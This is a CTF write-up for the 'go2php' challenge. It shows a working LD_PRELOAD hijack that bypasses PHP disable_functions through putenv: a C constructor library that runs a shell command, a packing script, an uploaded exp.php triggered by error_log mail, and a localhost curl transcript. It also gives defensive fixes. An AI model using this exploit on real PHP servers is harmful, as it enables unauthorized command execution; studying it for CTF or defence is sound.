
qwb 2025 go2php

[Last modified: 2025-10-21]

非预期

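题目没有禁用 putenv,因此可以利用 LD_PRELOAD 劫持;被预加载的 .so 文件也不需要拥有可执行权限,可读即可。(phar可以保留执行权限)原理是:putenv 设置的 LD_PRELOAD 会被 PHP 之后派生的子进程继承,动态链接器在子进程启动时加载该库并执行其构造函数。防御上应在 disable_functions 中禁用 putenv,并以 noexec 挂载 /tmp 等 Web 进程可写的目录(noexec 下动态链接器无法映射该库)。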

// evil.c
// gcc -shared -fPIC evil.c -o evil.so
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

// Library constructor: marked with __attribute__((constructor)), so the dynamic
// loader calls init() when this shared object is loaded into a process, without
// the host program ever calling it explicitly.
static void init() __attribute__((constructor));
static void init() {
    // Clear LD_PRELOAD before spawning anything -- presumably so the shell that
    // system() starts below does not load this library again and re-run init().
    unsetenv("LD_PRELOAD");
    // Run the challenge's /catflag binary and redirect its output to a file under
    // /var/www/html; the transcript at the end of the write-up fetches it over
    // HTTP as /flag.txt. The return value of system() is not checked.
    system("/catflag > /var/www/html/flag.txt");
}

gzip打包+base64编码

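<?php
/**
 * Pack a file as text: read it, gzip-compress it, then base64-encode the
 * compressed bytes and optionally save the result.
 */

// Configuration
$input_file = 'evil.so';       // file to process
$output_file = 'evil.so.b64';  // base64 output file (optional; an empty value skips the write)

// Read the file
if (!file_exists($input_file)) {
    die("[-] File not found: $input_file\n");
}

$data = file_get_contents($input_file);
if ($data === false) {
    // The file can exist and still be unreadable. A failed read returns false,
    // which would otherwise be coerced to an empty string, compressed, and
    // reported as saved.
    die("[-] Could not read: $input_file\n");
}

// gzip compression; 9 is the highest compression level
$compressed = gzencode($data, 9);
if ($compressed === false) {
    die("[-] gzip compression failed: $input_file\n");
}

// base64 encoding
$encoded = base64_encode($compressed);

if ($output_file) {
    // Only report success when the write actually happened.
    if (file_put_contents($output_file, $encoded) === false) {
        die("[-] Could not write: $output_file\n");
    }
    echo "\n[+] Saved to: $output_file\n";
}
?>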

exp.php如下

<?php
// Base64 text of the gzip-compressed shared object, i.e. the output of the
// packing script shown earlier on this page.
$encoded = "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";
// Reverse the packing: base64-decode, then gunzip, to recover the library bytes.
// Neither return value is checked, so a corrupted blob goes unnoticed here.
$compressed = base64_decode($encoded);
$data = gzdecode($compressed);
// Write the library to /tmp. The write-up notes it only needs to be readable,
// not executable.
file_put_contents('/tmp/evil.so', $data);
// putenv() changes the environment of the running PHP process, so any process
// it spawns afterwards inherits LD_PRELOAD.
putenv("LD_PRELOAD=/tmp/evil.so");
// message_type 1 tells error_log() to send the message by mail. On typical Unix
// builds that runs the configured sendmail command as a child process --
// presumably the process that loads /tmp/evil.so here.
// NOTE(review): the write-up attributes this path to putenv not being disabled;
// listing only the usual command-execution functions in disable_functions does
// not cover it.
error_log("trigger", 1);
?>
➜  go2php curl -X POST -F "file=@exp.php" http://127.0.0.1:6666/index.php
upload success: File uploaded to /home/ctf/c8719b1718b69e4a9d0c3b9b3052bf98.php%
➜  go2php curl -X POST -F "file=@exp.php" http://127.0.0.1:6666/flag.txt
QWBQWB{th1s_1s_a_test_f1ag}